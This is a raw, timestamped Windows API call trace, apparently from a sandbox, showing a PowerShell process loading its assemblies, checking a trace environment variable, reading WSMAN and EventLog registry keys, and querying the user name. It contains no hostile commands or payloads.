	[0286.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0286.627] VirtualQuery (in: lpAddress=0x12bbc0, lpBuffer=0x12ca80, dwLength=0x30 | out: lpBuffer=0x12ca80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.627] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xda6d089e, Data2=0xc812, Data3=0x4786, Data4=([0]=0x9c, [1]=0xc5, [2]=0xd9, [3]=0xc5, [4]=0x3f, [5]=0x1a, [6]=0xd3, [7]=0xb8))) returned 0x0
	[0286.627] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xaf686e42, Data2=0xb4a5, Data3=0x4913, Data4=([0]=0x95, [1]=0xe3, [2]=0x3d, [3]=0x38, [4]=0x9e, [5]=0x16, [6]=0x7b, [7]=0x7))) returned 0x0
	[0286.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0287.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0287.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0287.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0287.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0287.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0287.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0287.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0287.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0287.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0287.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0288.058] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0288.058] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.058] CoTaskMemFree (pv=0x24c3e0) 
	[0288.060] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0288.060] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.060] CoTaskMemFree (pv=0x24c3e0) 
	[0288.061] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0288.061] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.061] CoTaskMemFree (pv=0x24c3e0) 
	[0288.063] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0288.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.063] CoTaskMemFree (pv=0x24c3e0) 
	[0288.073] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0288.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.074] CoTaskMemFree (pv=0x24c3e0) 
	[0288.075] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0288.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.075] CoTaskMemFree (pv=0x24c3e0) 
	[0288.075] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0288.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.075] CoTaskMemFree (pv=0x24c3e0) 
	[0288.082] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d338 | out: phkResult=0x12d338*=0x300) returned 0x0
	[0288.085] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d23c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d238, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d23c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d238*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.086] CoTaskMemFree (pv=0x0) 
	[0288.086] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0288.086] RegEnumValueW (in: hKey=0x300, dwIndex=0x0, lpValueName=0x206630, lpcchValueName=0x12d2e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d2e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.087] CoTaskMemFree (pv=0x206630) 
	[0288.087] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0288.087] RegEnumValueW (in: hKey=0x300, dwIndex=0x1, lpValueName=0x206630, lpcchValueName=0x12d2e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d2e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.087] CoTaskMemFree (pv=0x206630) 
	[0288.087] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0288.087] RegEnumValueW (in: hKey=0x300, dwIndex=0x2, lpValueName=0x206630, lpcchValueName=0x12d2e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d2e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.087] CoTaskMemFree (pv=0x206630) 
	[0288.087] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d2cc, lpData=0x0, lpcbData=0x12d2c8*=0x0 | out: lpType=0x12d2cc*=0x1, lpData=0x0, lpcbData=0x12d2c8*=0x8) returned 0x0
	[0288.087] CoTaskMemAlloc (cb=0xc) returned 0x1b8a6b70
	[0288.087] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d29c, lpData=0x1b8a6b70, lpcbData=0x12d298*=0x8 | out: lpType=0x12d29c*=0x1, lpData="2.0", lpcbData=0x12d298*=0x8) returned 0x0
	[0288.087] CoTaskMemFree (pv=0x1b8a6b70) 
	[0289.444] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d288 | out: phkResult=0x12d288*=0x304) returned 0x0
	[0289.444] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d18c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d188, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d18c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d188*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.444] CoTaskMemFree (pv=0x0) 
	[0289.444] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0289.444] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x206630, lpcchValueName=0x12d238, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d238, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0289.444] CoTaskMemFree (pv=0x206630) 
	[0289.444] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0289.444] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x206630, lpcchValueName=0x12d238, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d238, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0289.445] CoTaskMemFree (pv=0x206630) 
	[0289.445] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0289.445] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x206630, lpcchValueName=0x12d238, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d238, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0289.445] CoTaskMemFree (pv=0x206630) 
	[0289.445] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d21c, lpData=0x0, lpcbData=0x12d218*=0x0 | out: lpType=0x12d21c*=0x1, lpData=0x0, lpcbData=0x12d218*=0x8) returned 0x0
	[0289.445] CoTaskMemAlloc (cb=0xc) returned 0x1b8a6a90
	[0289.445] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d1ec, lpData=0x1b8a6a90, lpcbData=0x12d1e8*=0x8 | out: lpType=0x12d1ec*=0x1, lpData="2.0", lpcbData=0x12d1e8*=0x8) returned 0x0
	[0289.445] CoTaskMemFree (pv=0x1b8a6a90) 
	[0289.447] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0289.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0289.447] CoTaskMemFree (pv=0x24c3e0) 
	[0289.451] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0289.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0289.451] CoTaskMemFree (pv=0x24c3e0) 
	[0289.457] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2b8 | out: phkResult=0x12d2b8*=0x308) returned 0x0
	[0289.458] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d22c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d228, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d22c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d228*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.458] CoTaskMemFree (pv=0x0) 
	[0289.459] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0289.459] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x206630, lpcchName=0x12d2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.460] CoTaskMemFree (pv=0x206630) 
	[0289.460] CoTaskMemFree (pv=0x0) 
	[0289.460] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0289.460] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x206630, lpcchName=0x12d2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.460] CoTaskMemFree (pv=0x206630) 
	[0289.460] CoTaskMemFree (pv=0x0) 
	[0289.460] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0289.460] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x206630, lpcchName=0x12d2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.460] CoTaskMemFree (pv=0x206630) 
	[0289.460] CoTaskMemFree (pv=0x0) 
	[0289.460] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0289.460] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x206630, lpcchName=0x12d2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.460] CoTaskMemFree (pv=0x206630) 
	[0289.460] CoTaskMemFree (pv=0x0) 
	[0289.460] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0289.460] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x206630, lpcchName=0x12d2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.460] CoTaskMemFree (pv=0x206630) 
	[0289.460] CoTaskMemFree (pv=0x0) 
	[0289.460] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0289.460] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x206630, lpcchName=0x12d2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.460] CoTaskMemFree (pv=0x206630) 
	[0289.460] CoTaskMemFree (pv=0x0) 
	[0289.460] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0289.460] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x206630, lpcchName=0x12d2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.461] CoTaskMemFree (pv=0x206630) 
	[0289.461] CoTaskMemFree (pv=0x0) 
	[0289.461] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0289.461] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x206630, lpcchName=0x12d2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.461] CoTaskMemFree (pv=0x206630) 
	[0289.461] CoTaskMemFree (pv=0x0) 
	[0289.461] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0289.461] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x206630, lpcchName=0x12d2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.461] CoTaskMemFree (pv=0x206630) 
	[0289.461] CoTaskMemFree (pv=0x0) 
	[0289.461] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x31c) returned 0x0
	[0289.461] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x0) returned 0x2
	[0289.461] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x32c) returned 0x0
	[0289.461] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x0) returned 0x2
	[0289.461] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x1c4) returned 0x0
	[0289.461] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x0) returned 0x2
	[0289.462] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x1cc) returned 0x0
	[0289.462] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x0) returned 0x2
	[0289.462] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x1c8) returned 0x0
	[0289.462] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x0) returned 0x2
	[0289.462] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x338) returned 0x0
	[0289.462] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x0) returned 0x2
	[0289.462] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x33c) returned 0x0
	[0289.462] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x0) returned 0x2
	[0289.462] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x340) returned 0x0
	[0289.462] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x0) returned 0x2
	[0289.462] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x344) returned 0x0
	[0289.463] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d318 | out: phkResult=0x12d318*=0x348) returned 0x0
	[0289.463] RegCloseKey (hKey=0x348) returned 0x0
	[0289.463] RegCloseKey (hKey=0x308) returned 0x0
	[0289.464] RegCloseKey (hKey=0x344) returned 0x0
	[0290.363] CoTaskMemAlloc (cb=0x804) returned 0x1b8b5ce0
	[0290.363] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8b5ce0, nSize=0x12d528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d528) returned 0x1
	[0290.364] CoTaskMemFree (pv=0x1b8b5ce0) 
	[0290.365] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0290.365] GetUserNameW (in: lpBuffer=0x206630, pcbBuffer=0x12d568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d568) returned 1
	[0290.365] CoTaskMemFree (pv=0x206630) 
	[0291.263] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d268 | out: phkResult=0x12d268*=0x34c) returned 0x0
	[0291.263] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d1dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d1d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d1dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d1d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.263] CoTaskMemFree (pv=0x0) 
	[0291.263] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.263] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.264] CoTaskMemFree (pv=0x206630) 
	[0291.264] CoTaskMemFree (pv=0x0) 
	[0291.264] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.264] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.264] CoTaskMemFree (pv=0x206630) 
	[0291.264] CoTaskMemFree (pv=0x0) 
	[0291.264] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.264] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.264] CoTaskMemFree (pv=0x206630) 
	[0291.264] CoTaskMemFree (pv=0x0) 
	[0291.264] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0291.264] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x206630, lpcchName=0x12d268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.264] CoTaskMemFree (pv=0x206630) 
	[0291.264] CoTaskMemFree (pv=0x0) 
